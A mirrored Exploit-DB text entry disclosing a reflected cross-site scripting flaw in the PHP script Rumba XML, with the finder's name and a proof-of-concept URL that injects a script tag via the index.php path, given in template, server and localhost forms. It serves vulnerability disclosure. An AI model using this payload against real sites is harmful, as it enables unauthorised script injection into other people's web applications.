exploit-db-mirror/exploits/php/webapps/10534.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

26 lines
No EOL
643 B
Text

###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#
###########################################
PoC :
http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>
example :
http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>
local Example :
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>